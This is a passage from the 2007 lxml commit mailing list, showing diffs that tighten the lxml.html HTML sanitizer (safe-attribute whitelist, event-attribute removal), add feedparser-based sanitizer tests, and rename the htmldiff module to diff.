Element(*args, **kw): v = html_parser.makeelement(*args, **kw) return v Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 20:11:25 2007 @@ -1,7 +1,7 @@ import re from lxml import etree from lxml.html import defs -from lxml.html import parse_element, tostring +from lxml.html import parse, tostring __all__ = ['clean_html', 'clean'] @@ -25,26 +25,36 @@ Like clean(), but takes a text input document, and returns a text document. """ - doc = parse_element(html, create_parent=True) + doc = parse(html) clean(doc, **kw) return tostring(doc) +def _itertree(el): + """ + Return the element's descendants, and the element itself + """ + yield el + for item in el.iterdescendants(): + yield item + def clean(doc, scripts=True, javascript=True, comments=True, # process instructions? style=False, - links=False, - meta=False, - page_structure=False, + links=True, + meta=True, + page_structure=True, embedded=True, frames=True, forms=True, + annoying_tags=True, remove_tags=None, allow_tags=None, strip_tags=True, remove_unknown_tags=True, + safe_attrs_only=True, add_nofollow=False, # callbacks? ): @@ -70,7 +80,8 @@ Remove any ``<meta>`` tags ``page_structure``: - Structural parts of a page: ``<head>``, ``<html>``, ``<title>`` + Structural parts of a page: ``<head>``, ``<html>``, ``<title>``. + Also xmlns attributes are removed with this. ``embedded``: Remove any embedded objects (flash, iframes) @@ -81,6 +92,9 @@ ``forms``: Remove any form tags + ``annoying_tags``: + Tags that aren't *wrong*, but are annoying. ``<blink>`` (FIXME: marquee?) + ``remove_tags``: A list of tags to remove. @@ -95,6 +109,11 @@ ``remove_unknown_tags``: Remove any tags that aren't standard parts of HTML. + ``safe_attrs_only``: + If true, only include 'safe' attributes (specifically the list + from `feedparser + <http://feedparser.org/docs/html-sanitization.html>`_). + ``add_nofollow``: If true, then any <a> tags will have ``rel="nofollow"`` added to them. @@ -108,12 +127,23 @@ remove_tags = list(remove_tags or []) if scripts: kill_tags.append('script') + if safe_attrs_only: + safe_attrs = set(defs.safe_attrs) + for el in _itertree(doc): + for aname in el.attrib.keys(): + if aname not in defs.safe_attrs: + del el.attrib[aname] if javascript: - for attrib in defs.event_attrs: - for el in doc.xpath('descendant-or-self::*[@%s]' % attrib): - del el.attrib[attrib] + if not safe_attrs_only: + # safe_attrs handles events attributes itself + for el in _itertree(doc): + for aname in el.attrib.keys(): + if aname.startswith('on'): + del el.attrib[aname] doc.rewrite_links(_remove_javascript, resolve_base_href=False) if not style: + # If we're deleting style then we don't have to remove JS links + # from styles, otherwise... for el in doc.xpath('descendant-or-self::*[@style]'): old = el.attrib['style'] new = _css_javascript_re.sub('', old) @@ -127,7 +157,7 @@ if comments: # Easier way? bad = [] - for el in doc.iterdescendants(): + for el in _itertree(doc): if isinstance(el, etree._Comment): bad.append(el) for el in bad: @@ -144,16 +174,25 @@ kill_tags.append('meta') if page_structure: remove_tags.extend(['head', 'html', 'title']) + # FIXME: is this really the right place to remove these attributes? + for el in doc.xpath('descendant-or-self::*[@xmlns]'): + del el.attrib['xmlns'] if embedded: # FIXME: is <layer> really embedded? - kill_tags.extend(['object', 'embed', 'iframe', 'applet', 'layer']) + kill_tags.extend(['applet', 'param']) + # The alternate contents that are in an iframe are a good fallback: + # FIXME: somehow embed seems to be getting data, but from what I + # can tell the embed tag is supposed to always be empty + remove_tags.extend(['iframe', 'object', 'embed', 'layer']) if frames: kill_tags.extend(defs.frame_tags) if forms: remove_tags.extend(['form']) kill_tags.extend(['button', 'input', 'select', 'textarea']) + if annoying_tags: + remove_tags.extend(['blink']) bad = [] - for el in doc.iterdescendants(): + for el in _itertree(doc): if el.tag in kill_tags: bad.append(el) for el in bad: @@ -164,7 +203,13 @@ for tag in remove_tags]) for el in doc.xpath(xpath): if strip_tags: - el.drop_tag() + if el.getparent(): + el.drop_tag() + else: + # We have to drop the parent-most tag, which we can't + # do. Instead we'll rewrite it: + el.tag = 'div' + el.attrib.clear() else: # FIXME: Should we test if this has been removed because of a parent? el.drop_element() @@ -175,7 +220,7 @@ allow_tags = defs.tags if allow_tags: bad = [] - for el in doc.iterdescendants(): + for el in _itertree(doc): if el.tag not in allow_tags: bad.append(el) for el in bad: Modified: lxml/branch/html/src/lxml/html/defs.py ============================================================================== --- lxml/branch/html/src/lxml/html/defs.py (original) +++ lxml/branch/html/src/lxml/html/defs.py Fri Jun 1 20:11:25 2007 @@ -19,14 +19,27 @@ 'usemap'] # Not in the HTML 4 spec: -# onerror +# onerror, onresize event_attrs = [ 'onblur', 'onchange', 'onclick', 'ondblclick', 'onerror', 'onfocus', 'onkeydown', 'onkeypress', 'onkeyup', 'onload', 'onmousedown', 'onmousemove', 'onmouseout', 'onmouseover', - 'onmouseup', 'onreset', 'onselect', 'onsubmit', 'onunload', + 'onmouseup', 'onreset', 'onresize', 'onselect', 'onsubmit', + 'onunload', ] +safe_attrs = [ + 'abbr', 'accept', 'accept-charset', 'accesskey', 'action', 'align', + 'alt', 'axis', 'border', 'cellpadding', 'cellspacing', 'char', 'charoff', + 'charset', 'checked', 'cite', 'class', 'clear', 'cols', 'colspan', + 'color', 'compact', 'coords', 'datetime', 'dir', 'disabled', 'enctype', + 'for', 'frame', 'headers', 'height', 'href', 'hreflang', 'hspace', 'id', + 'ismap', 'label', 'lang', 'longdesc', 'maxlength', 'media', 'method', + 'multiple', 'name', 'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', + 'rel', 'rev', 'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', + 'size', 'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title', + 'type', 'usemap', 'valign', 'value', 'vspace', 'width'] + # From http://htmlhelp.com/reference/html40/olist.html top_level_tags = [ 'html', 'head', 'body', 'frameset', Added: lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py Fri Jun 1 20:11:25 2007 @@ -0,0 +1,83 @@ +import os +import re +import rfc822 +import unittest +from lxml.tests.common_imports import doctest +from lxml.doctestcompare import LHTMLOutputChecker + +from lxml.html import HTML, parse_element +from lxml.html.clean import clean, clean_html + +feed_dir = os.path.join(os.path.dirname(__file__), 'feedparser-data') +bar_re = re.compile(r"-----+") + +class DummyInput: + def __init__(self, **kw): + for name, value in kw.items(): + setattr(self, name, value) + +class FeedTestCase(unittest.TestCase): + + def __init__(self, filename): + self.filename = filename + unittest.TestCase.__init__(self) + + def parse(self): + f = open(self.filename, 'rb') + headers = rfc822.Message(f) + c = f.read() + f.close() + if not headers.keys(): + raise Exception( + "File %s has no headers" % self.filename) + self.description = headers['Description'] + self.expect = headers['Expect'] + self.ignore = headers.get('Ignore') + self.options = [ + o.strip() for o in headers['Options'].split(',') + if o.strip()] + parts = bar_re.split(c) + self.input = parts[0].rstrip() + '\n' + if parts[1:]: + self.expect = parts[1].rstrip() + '\n' + else: + self.expect = None + + def runTest(self): + self.parse() + if self.ignore: + # We've marked this test to be ignored. + return + kw = {} + for name in self.options: + if name.startswith('-'): + kw[name[1:]] = False + else: + kw[name] = True + transformed = clean_html(self.input, **kw) + assert self.expect is not None, ( + "No expected output in %s" % self.filename) + checker = LHTMLOutputChecker() + if not checker.check_output(self.expect, transformed, 0): + result = checker.output_difference( + DummyInput(want=self.expect), transformed, 0) + #result += '\noptions: %s %r' % (', '.join(self.options), kw) + #result += repr(transformed) + raise Exception("\n"+result) + + def shortDescription(self): + return self.filename + +def test_suite(): + suite = unittest.TestSuite() + for fn in os.listdir(feed_dir): + fn = os.path.join(feed_dir, fn) + if fn.endswith('.data'): + case = FeedTestCase(fn) + suite.addTests([case]) + # This is my lazy way of stopping on first error: + try: + case.runTest() + except: + break + return suite Added: lxml/branch/html/src/lxml/html/tests/transform_feedparser_data.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/transform_feedparser_data.py Fri Jun 1 20:11:25 2007 @@ -0,0 +1,110 @@ +""" +This takes the feedparser tests from here: + + http://feedparser.org/tests/wellformed/sanitize/ + +and rewrites them to be easier to handle (not using the internal model +of feedparser). The input format is:: + + <!-- + Description: {description} + Expect: {expression} + --> + ... + <content ...>{content}</content> + ... + +The Expect expression is checked for +``entries[0]['content'][0]['value'] == {data}``. + +The output format is:: + + Description: {description} + Expect: {expression} (if data couldn't be parsed) + Options: + + {content, unescaped} + ---------- + {data, unescaped, if found} + +""" + +import re +import os +import traceback + +_desc_re = re.compile(r'\s*Description:\s*(.*)') +_expect_re = re.compile(r'\s*Expect:\s*(.*)') +_data_expect_re = re.compile(r"entries\[0\]\['[^']+'\](?:\[0\]\['value'\])?\s*==\s*(.*)") +_feed_data_expect_re = re.compile(r"feed\['[^']+'\]\s*==\s*(.*)") + +def parse_content(content): + match = _desc_re.search(content) + desc = match.group(1) + match = _expect_re.search(content) + expect = match.group(1) + data = None + for regex in [_data_expect_re, _feed_data_expect_re]: + match = regex.search(expect) + if match: + # Icky, but I'll trust it + data = eval(match.group(1).strip()) + break + c = None + for tag in ['content', 'summary', 'title', 'copyright', 'tagline', 'info', 'subtitle', 'fullitem', 'body', 'description', 'content:encoded']: + regex = re.compile(r"<%s.*?>(.*)</%s>" % (tag, tag), re.S) + match = regex.search(content) + if match: + c = match.group(1) + break + assert c is not None + # Seems like body isn't quoted + if tag != 'body': + c = c.replace('<', '<') + c = c.replace('&', '&') + # FIXME: I should really do more unescaping... + return { + 'Description': desc, + 'Expect': expect, + 'data': data, + 'content': c} + +def serialize_content(d): + s = '''\ +Description: %(Description)s +Expect: %(Expect)s +Options: + +%(content)s +''' % d + if d.get('data') is not None: + s += '----------\n%s' % d['data'] + return s + +def translate_file(filename): + f = open(filename, 'rb') + c = f.read() + f.close() + try: + output = serialize_content(parse_content(c)) + except: + print 'Bad data in %s:' % filename + print c + traceback.print_exc() + print '-'*60 + return + new = os.path.splitext(filename)[0] + '.data' + f = open(new, 'wb') + f.write(output) + f.close() + +def translate_all(dir): + for fn in os.listdir(dir): + fn = os.path.join(dir, fn) + if fn.endswith('.xml'): + translate_file(fn) + +if __name__ == '__main__': + import sys + translate_all(os.path.join(os.path.dirname(__file__), 'feedparser-data')) + From ianb at codespeak.net Fri Jun 1 20:23:36 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 20:23:36 +0200 (CEST) Subject: [Lxml-checkins] r43977 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070601182336.70C0280AD@code0.codespeak.net> Author: ianb Date: Fri Jun 1 20:23:35 2007 New Revision: 43977 Added: lxml/branch/html/src/lxml/html/diff.py - copied, changed from r43962, lxml/branch/html/src/lxml/html/htmldiff.py lxml/branch/html/src/lxml/html/tests/test_diff.py - copied, changed from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.py lxml/branch/html/src/lxml/html/tests/test_diff.txt - copied, changed from r43962, lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt Removed: lxml/branch/html/src/lxml/html/htmldiff.py lxml/branch/html/src/lxml/html/tests/test_htmldiff.py lxml/branch/html/src/lxml/html/tests/test_htmldiff.txt Modified: lxml/branch/html/src/lxml/html/__init__.py Log: Remove debugging print; rename htmldiff to diff (lxml.html.diff) Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 1 20:23:35 2007 @@ -316,8 +316,6 @@ if not isinstance(create_parent, basestring): create_parent = 'div' return parse_element('<%s>%s</%s>' % (create_parent, html, create_parent)) - else: - print '----------\n', html elements = parse_elements(html, no_leading_text=True) if not elements: raise etree.ParserError( Copied: lxml/branch/html/src/lxml/html/diff.py (from r43962, lxml/branch/html/src/lxml/html/htmldiff.py) ============================================================================== --- lxml/branch/html/src/lxml/html/htmldiff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Fri Jun 1 20:23:35 2007 @@ -770,7 +770,8 @@ if not _contains_block_level_tag(el): continue _move_el_inside_block(el, tag=tag) - _merge_element_contents(el) + el.drop_tag() + #_merge_element_contents(el) def _contains_block_level_tag(el): """True if the element contains any block-level elements, like <p>, <td>, etc. Deleted: /lxml/branch/html/src/lxml/html/htmldiff.py ============================================================================== --- /lxml/branch/html/src/lxml/html/htmldiff.py Fri Jun 1 20:23:35 2007 +++ (empty file) @@ -1,890 +0,0 @@ -import difflib -from lxml import etree -from lxml.html import parse_element -import cgi -import re - -__all__ = ['html_annotate', 'htmldiff'] - - -############################################################ -## Annotation -############################################################ - -def default_markup(text, version): - return '<span title="%s">%s</span>' % ( - cgi.escape(unicode(version), 1), text) - -def html_annotate(doclist, markup=default_markup): - """ - doclist should be ordered from oldest to newest, like:: - - >>> version1 = 'Hello World' - >>> version2 = 'Goodbye World' - >>> html_annotate([(version1, 'version 1'), - ... (version2, 'version 2')]) - u'<span title="version 2">Goodbye</span> <span title="version 1">World</span>' - - The documents must be *fragments* (str/UTF8 or unicode), not - complete documents - - The markup argument is a function to markup the spans of words. - This function is called like markup('Hello', 'version 2'), and - returns HTML. The first argument is text and never includes any - markup. The default uses a span with a title: - - >>> default_markup('Some Text', 'by Joe') - u'<span title="by Joe">Some Text</span>' - """ - # The basic strategy we have is to split the documents up into - # logical tokens (which are words with attached markup). We then - # do diffs of each of the versions to track when a token first - # appeared in the document; the annotation attached to the token - # is the version where it first appeared. - tokenlist = [tokenize_annotated(doc, version) - for doc, version in doclist] - cur_tokens = tokenlist[0] - for tokens in tokenlist[1:]: - html_annotate_merge_annotations(cur_tokens, tokens) - cur_tokens = tokens - - # After we've tracked all the tokens, we can combine spans of text - # that are adjacent and have the same annotation - cur_tokens = compress_tokens(cur_tokens) - # And finally add markup - result = markup_serialize_tokens(cur_tokens, markup) - return ''.join(result).strip() - -def tokenize_annotated(doc, annotation): - """Tokenize a document and add an annotation attribute to each token - """ - tokens = tokenize(doc, include_hrefs=False) - for tok in tokens: - tok.annotation = annotation - return tokens - -def html_annotate_merge_annotations(tokens_old, tokens_new): - """Merge the annotations from tokens_old into tokens_new, when the - tokens in the new document already existed in the old document. - """ - s = InsensitiveSequenceMatcher(a=tokens_old, b=tokens_new) - commands = s.get_opcodes() - - for command, i1, i2, j1, j2 in commands: - if command == 'equal': - eq_old = tokens_old[i1:i2] - eq_new = tokens_new[j1:j2] - copy_annotations(eq_old, eq_new) - -def copy_annotations(src, dest): - """ - Copy annotations from the tokens listed in src to the tokens in dest - """ - assert len(src) == len(dest) - for src_tok, dest_tok in zip(src, dest): - dest_tok.annotation = src_tok.annotation - -def compress_tokens(tokens): - """ - Combine adjacent tokens when there is no HTML between the tokens, - and they share an annotation - """ - result = [tokens[0]] - for tok in tokens[1:]: - if (not result[-1].post_tags and - not tok.pre_tags and - result[-1].annotation == tok.annotation): - compress_merge_back(result, tok) - else: - result.append(tok) - return result - -def compress_merge_back(tokens, tok): - """ Merge tok into the last element of tokens (modifying the list of - tokens in-place). """ - last = tokens[-1] - if type(last) is not token or type(tok) is not token: - tokens.append(tok) - else: - text = unicode(last) - if last.trailing_whitespace: - text += ' ' - text += tok - merged = token(text, - pre_tags=last.pre_tags, - post_tags=tok.post_tags, - trailing_whitespace=tok.trailing_whitespace) - merged.annotation = last.annotation - tokens[-1] = merged - -def markup_serialize_tokens(tokens, markup_func): - """ - Serialize the list of tokens into a list of text chunks, calling - markup_func around text to add annotations. - """ - for token in tokens: - for pre in token.pre_tags: - yield pre - html = token.html() - html = markup_func(html, token.annotation) - if token.trailing_whitespace: - html += ' ' - yield html - for post in token.post_tags: - yield post - - -############################################################ -## HTML Diffs -############################################################ - -def htmldiff(old_html, new_html): - """ Do a diff of the old and new document. The documents are HTML - *fragments* (str/UTF8 or unicode), they are not complete documents - (i.e., no <html> tag). - - Returns HTML with <ins> and <del> tags added around the - appropriate text. - - Markup is generally ignored, with the markup from new_html - preserved, and possibly some markup from old_html (though it is - considered acceptable to lose some of the old markup). Only the - words in the HTML are diffed. The exception is <img> tags, which - are treated like words, and the href attribute of <a> tags, which - are noted inside the tag itself when there are changes. - """ - old_html_tokens = tokenize(old_html) - new_html_tokens = tokenize(new_html) - result = htmldiff_tokens(old_html_tokens, new_html_tokens) - result = ''.join(result).strip() - return fixup_ins_del_tags(result) - -def htmldiff_tokens(html1_tokens, html2_tokens): - """ Does a diff on the tokens themselves, returning a list of text - chunks (not tokens). - """ - # There are several passes as we do the differences. The tokens - # isolate the portion of the content we care to diff; difflib does - # all the actual hard work at that point. - # - # Then we must create a valid document from pieces of both the old - # document and the new document. We generally prefer to take - # markup from the new document, and only do a best effort attempt - # to keep markup from the old document; anything that we can't - # resolve we throw away. Also we try to put the deletes as close - # to the location where we think they would have been -- because - # we are only keeping the markup from the new document, it can be - # fuzzy where in the new document the old text would have gone. - # Again we just do a best effort attempt. - s = InsensitiveSequenceMatcher(a=html1_tokens, b=html2_tokens) - commands = s.get_opcodes() - result = [] - for command, i1, i2, j1, j2 in commands: - if command == 'equal': - result.extend(expand_tokens(html2_tokens[j1:j2], equal=True)) - continue - if command == 'insert' or command == 'replace': - ins_tokens = expand_tokens(html2_tokens[j1:j2]) - merge_insert(ins_tokens, result) - if command == 'delete' or command == 'replace': - del_tokens = expand_tokens(html1_tokens[i1:i2]) - merge_delete(del_tokens, result) - # If deletes were inserted directly as <del> then we'd have an - # invalid document at this point. Instead we put in special - # markers, and when the complete diffed document has been created - # we try to move the deletes around and resolve any problems. - result = cleanup_delete(result) - - return result - -def expand_tokens(tokens, equal=False): - """Given a list of tokens, return a generator of the chunks of - text for the data in the tokens. - """ - for token in tokens: - for pre in token.pre_tags: - yield pre - if not equal or not token.hide_when_equal: - if token.trailing_whitespace: - yield token.html() + ' ' - else: - yield token.html() - for post in token.post_tags: - yield post - -def merge_insert(ins_chunks, doc): - """ doc is the already-handled document (as a list of text chunks); - here we add <ins>ins_chunks</ins> to the end of that. """ - # Though we don't throw away unbalanced_start or unbalanced_end - # (we assume there is accompanying markup later or earlier in the - # document), we only put <ins> around the balanced portion. - unbalanced_start, balanced, unbalanced_end = split_unbalanced(ins_chunks) - doc.extend(unbalanced_start) - if doc and not doc[-1].endswith(' '): - # Fix up the case where the word before the insert didn't end with - # a space - doc[-1] += ' ' - doc.append('<ins>') - if balanced and balanced[-1].endswith(' '): - # We move space outside of </ins> - balanced[-1] = balanced[-1][:-1] - doc.extend(balanced) - doc.append('</ins> ') - doc.extend(unbalanced_end) - -# These are sentinals to represent the start and end of a <del> -# segment, until we do the cleanup phase to turn them into proper -# markup: -class DEL_START: - pass -class DEL_END: - pass - -class NoDeletes(Exception): - """ Raised when the document no longer contains any pending deletes - (DEL_START/DEL_END) """ - -def merge_delete(del_chunks, doc): - """ Adds the text chunks in del_chunks to the document doc (another - list of text chunks) with marker to show it is a delete. - cleanup_delete later resolves these markers into <del> tags.""" - doc.append(DEL_START) - doc.extend(del_chunks) - doc.append(DEL_END) - -def cleanup_delete(chunks): - """ Cleans up any DEL_START/DEL_END markers in the document, replacing - them with <del></del>. To do this while keeping the document - valid, it may need to drop some tags (either start or end tags). - - It may also move the del into adjacent tags to try to move it to a - similar location where it was originally located (e.g., moving a - delete into preceding <div> tag, if the del looks like (DEL_START, - 'Text</div>', DEL_END)""" - while 1: - # Find a pending DEL_START/DEL_END, splitting the document - # into stuff-preceding-DEL_START, stuff-inside, and - # stuff-following-DEL_END - try: - pre_delete, delete, post_delete = split_delete(chunks) - except NoDeletes: - # Nothing found, we've cleaned up the entire doc - break - # The stuff-inside-DEL_START/END may not be well balanced - # markup. First we figure out what unbalanced portions there are: - unbalanced_start, balanced, unbalanced_end = split_unbalanced(delete) - # Then we move the span forward and/or backward based on these - # unbalanced portions: - locate_unbalanced_start(unbalanced_start, pre_delete, post_delete) - locate_unbalanced_end(unbalanced_end, pre_delete, post_delete) - doc = pre_delete - if doc and not doc[-1].endswith(' '): - # Fix up case where the word before us didn't have a trailing space - doc[-1] += ' ' - doc.append('<del>') - if balanced and balanced[-1].endswith(' '): - # We move space outside of </del> - balanced[-1] = balanced[-1][:-1] - doc.extend(balanced) - doc.append('</del> ') - doc.extend(post_delete) - chunks = doc - return chunks - -def split_unbalanced(chunks): - """Return (unbalanced_start, balanced, unbalanced_end), where each is - a list of text and tag chunks. - - unbalanced_start is a list of all the tags that are opened, but - not closed in this span. Similarly, unbalanced_end is a list of - tags that are closed but were not opened. Extracting these might - mean some reordering of the chunks.""" - start = [] - end = [] - tag_stack = [] - balanced = [] - for chunk in chunks: - if not chunk.startswith('<'): - balanced.append(chunk) - continue - endtag = chunk[1] == '/' - name = chunk.split()[0].strip('<>/') - if name in empty_tags: - assert not endtag, ( - "Empty tag %r should have no end tag" % chunk) - balanced.append(chunk) - continue - if endtag: - if tag_stack and tag_stack[-1][0] == name: - balanced.append(chunk) - name, pos, tag = tag_stack.pop() - balanced[pos] = tag - elif tag_stack: - start.extend(tag for name, pos, tag in tag_stack) - tag_stack = [] - end.append(chunk) - else: - end.append(chunk) - else: - tag_stack.append((name, len(balanced), chunk)) - balanced.append(None) - start.extend( - [chunk for name, pos, chunk in tag_stack]) - balanced = [chunk for chunk in balanced if chunk is not None] - return start, balanced, end - -def split_delete(chunks): - """ Returns (stuff_before_DEL_START, stuff_inside_DEL_START_END, - stuff_after_DEL_END). Returns the first case found (there may be - more DEL_STARTs in stuff_after_DEL_END). Raises NoDeletes if - there's no DEL_START found. """ - try: - pos = chunks.index(DEL_START) - except ValueError: - raise NoDeletes - pos2 = chunks.index(DEL_END) - return chunks[:pos], chunks[pos+1:pos2], chunks[pos2+1:] - -def locate_unbalanced_start(unbalanced_start, pre_delete, post_delete): - """ pre_delete and post_delete implicitly point to a place in the - document (where the two were split). This moves that point (by - popping items from one and pushing them onto the other). It moves - the point to try to find a place where unbalanced_start applies. - - As an example:: - - >>> unbalanced_start = ['<div>'] - >>> doc = ['<p>', 'Text', '</p>', '<div>', 'More Text', '</div>'] - >>> pre, post = doc[:3], doc[3:] - >>> pre, post - (['<p>', 'Text', '</p>'], ['<div>', 'More Text', '</div>']) - >>> locate_unbalanced_start(unbalanced_start, pre, post) - >>> pre, post - (['<p>', 'Text', '</p>', '<div>'], ['More Text', '</div>']) - - As you can see, we moved the point so that the dangling <div> that - we found will be effectively replaced by the div in the original - document. If this doesn't work out, we just throw away - unbalanced_start without doing anything. - """ - while 1: - if not unbalanced_start: - # We have totally succeded in finding the position - break - finding = unbalanced_start[0] - finding_name = finding.split()[0].strip('<>') - if not post_delete: - break - next = post_delete[0] - if next is DEL_START or not next.startswith('<'): - # Reached a word, we can't move the delete text forward - break - if next[1] == '/': - # Reached a closing tag, can we go further? Maybe not... - break - name = next.split()[0].strip('<>') - if name == 'ins': - # Can't move into an insert - break - assert name != 'del', ( - "Unexpected delete tag: %r" % next) - if name == finding_name: - unbalanced_start.pop(0) - pre_delete.append(post_delete.pop(0)) - else: - # Found a tag that doesn't match - break - -def locate_unbalanced_end(unbalanced_end, pre_delete, post_delete): - """ like locate_unbalanced_start, except handling end tags and - possibly moving the point earlier in the document. """ - while 1: - if not unbalanced_end: - # Success - break - finding = unbalanced_end[-1] - finding_name = finding.split()[0].strip('<>/') - if not pre_delete: - break - next = pre_delete[-1] - if next is DEL_END or not next.startswith('</'): - # A word or a start tag - break - name = next.split()[0].strip('<>/') - if name == 'ins' or name == 'del': - # Can't move into an insert or delete - break - if name == finding_name: - unbalanced_end.pop() - post_delete.insert(0, pre_delete.pop()) - else: - # Found a tag that doesn't match - break - -class token(unicode): - """ Represents a diffable token, generally a word that is displayed to - the user. Opening tags are attached to this token when they are - adjacent (pre_tags) and closing tags that follow the word - (post_tags). Some exceptions occur when there are empty tags - adjacent to a word, so there may be close tags in pre_tags, or - open tags in post_tags. - - We also keep track of whether the word was originally followed by - whitespace, even though we do not want to treat the word as - equivalent to a similar word that does not have a trailing - space.""" - - # When this is true, the token will be eliminated from the - # displayed diff if no change has occurred: - hide_when_equal = False - - def __new__(cls, text, pre_tags=None, post_tags=None, trailing_whitespace=False): - obj = unicode.__new__(cls, text) - - if pre_tags is not None: - obj.pre_tags = pre_tags - else: - obj.pre_tags = [] - - if post_tags is not None: - obj.post_tags = post_tags - else: - obj.post_tags = [] - - obj.trailing_whitespace = trailing_whitespace - - return obj - - def __repr__(self): - return 'token(%s, %r, %r)' % (unicode.__repr__(self), self.pre_tags, self.post_tags) - - def html(self): - return unicode(self) - -class tag_token(token): - - """ Represents a token that is actually a tag. Currently this is just - the <img> tag, which takes up visible space just like a word but - is only represented in a document by a tag. """ - - def __new__(cls, tag, data, html_repr, pre_tags=None, - post_tags=None, trailing_whitespace=False): - obj = token.__new__(cls, "%s: %s" % (type, data), - pre_tags=pre_tags, - post_tags=post_tags, - trailing_whitespace=trailing_whitespace) - obj.tag = tag - obj.data = data - obj.html_repr = html_repr - return obj - - def __repr__(self): - return 'tag_token(%s, %s, html_repr=%s, post_tags=%r, pre_tags=%r, trailing_whitespace=%s)' % ( - self.tag, - self.data, - self.html_repr, - self.pre_tags, - self.post_tags, - self.trailing_whitespace) - def html(self): - return self.html_repr - -class href_token(token): - - """ Represents the href in an anchor tag. Unlike other words, we only - show the href when it changes. """ - - hide_when_equal = True - - def html(self): - return 'Link: %s' % self - -def tokenize(html, include_hrefs=True): - """ - Parse the given HTML and returns token objects (words with attached tags). - - This parses only the content of a page; anything in the head is - ignored, and the <head> and <body> elements are themselves - optional. The content is then parsed by lxml, which ensures the - validity of the resulting parsed document (though lxml may make - incorrect guesses when the markup is particular bad). - - <ins> and <del> tags are also eliminated from the document, as - that gets confusing. - - If include_hrefs is true, then the href attribute of <a> tags is - included as a special kind of diffable token.""" - body_el = parse_html(html, cleanup=True) - # Then we split the document into text chunks for each tag, word, and end tag: - chunks = flatten_el(body_el, drop_tag=True, include_hrefs=include_hrefs) - # Finally re-joining them into token objects: - return fixup_chunks(chunks) - -def parse_html(html, cleanup=True): - """ - Parses an HTML fragment, returning an lxml element. Note that the HTML will be - wrapped in a <div> tag that was not in the original document. - - If cleanup is true, make sure there's no <head> or <body>, and get - rid of any <ins> and <del> tags. - """ - if cleanup: - # This removes any extra markup or structure like <head>: - html = cleanup_html(html) - return parse_element(html, create_parent=True) - -_body_re = re.compile(r'<body.*?>', re.I|re.S) -_end_body_re = re.compile(r'</body.*?>', re.I|re.S) -_ins_del_re = re.compile(r'</?(ins|del).*?>', re.I|re.S) - -def cleanup_html(html): - """ This 'cleans' the HTML, meaning that any page structure is removed - (only the contents of <body> are used, if there is any <body). - Also <ins> and <del> tags are removed. """ - match = _body_re.search(html) - if match: - html = html[match.end():] - match = _end_body_re.search(html) - if match: - html = html[:match.start()] - html = _ins_del_re.sub('', html) - return html - - -end_whitespace_re = re.compile(r'[ \t\n\r]$') - -def fixup_chunks(chunks): - """ - This function takes a list of chunks and produces a list of tokens. - """ - tag_accum = [] - cur_word = None - result = [] - for chunk in chunks: - if isinstance(chunk, tuple): - if chunk[0] == 'img': - src = chunk[1] - tag = chunk[2] - if tag.endswith(' '): - tag = tag[:-1] - trailing_whitespace = True - else: - trailing_whitespace = False - cur_word = tag_token('img', src, html_repr=tag, - pre_tags=tag_accum, - trailing_whitespace=trailing_whitespace) - tag_accum = [] - result.append(cur_word) - elif chunk[0] == 'href': - href = chunk[1] - cur_word = href_token(href, pre_tags=tag_accum, trailing_whitespace=True) - tag_accum = [] - result.append(cur_word) - continue - if is_word(chunk): - if chunk.endswith(' '): - chunk = chunk[:-1] - trailing_whitespace = True - else: - trailing_whitespace = False - cur_word = token(chunk, pre_tags=tag_accum, trailing_whitespace=trailing_whitespace) - tag_accum = [] - result.append(cur_word) - elif is_start_tag(chunk): - tag_accum.append(chunk) - elif is_end_tag(chunk): - if tag_accum: - tag_accum.append(chunk) - else: - assert cur_word, ( - "Weird state, cur_word=%r, result=%r, chunks=%r of %r" - % (cur_word, result, chunk, chunks)) - cur_word.post_tags.append(chunk) - else: - assert(0) - - if not result: - return [token('', pre_tags=tag_accum)] - else: - result[-1].post_tags.extend(tag_accum) - - return result - - -# All the tags in HTML that don't require end tags: -empty_tags = ( - 'param', 'img', 'area', 'br', 'basefont', 'input', - 'base', 'meta', 'link', 'col') - -block_level_tags = ( - 'address', - 'blockquote', - 'center', - 'dir', - 'div', - 'dl', - 'fieldset', - 'form', - 'h1', - 'h2', - 'h3', - 'h4', - 'h5', - 'h6', - 'hr', - 'isindex', - 'menu', - 'noframes', - 'noscript', - 'ol', - 'p', - 'pre', - 'table', - 'ul', - ) - -block_level_container_tags = ( - 'dd', - 'dt', - 'frameset', - 'li', - 'tbody', - 'td', - 'tfoot', - 'th', - 'thead', - 'tr', - ) - - -def flatten_el(el, include_hrefs, drop_tag=False): - """ Takes an lxml element el, and generates all the text chunks for - that tag. Each start tag is a chunk, each word is a chunk, and each - end tag is a chunk. - - If drop_tag is true, then the outermost container tag is - not returned (just its contents).""" - if not drop_tag: - if el.tag == 'img': - yield ('img', el.attrib['src'], start_tag(el)) - else: - yield start_tag(el) - if el.tag in empty_tags and not el.text and not len(el): - return - start_words = split_words(el.text) - for word in start_words: - yield cgi.escape(word) - for child in el: - for item in flatten_el(child, include_hrefs=include_hrefs): - yield item - if el.tag == 'a' and el.attrib.get('href') and include_hrefs: - yield ('href', el.attrib['href']) - if not drop_tag: - yield end_tag(el) - end_words = split_words(el.tail) - for word in end_words: - yield cgi.escape(word) - -def split_words(text): - """ Splits some text into words. Includes trailing whitespace (one - space) on each word when appropriate. """ - if not text or not text.strip(): - return [] - words = [w + ' ' for w in text.strip().split()] - if not end_whitespace_re.search(text): - words[-1] = words[-1][:-1] - return words - -start_whitespace_re = re.compile(r'^[ \t\n\r]') - -def start_tag(el): - """ - The text representation of the start tag for a tag. - """ - return '<%s%s>' % ( - el.tag, ''.join(' %s="%s"' % (name, 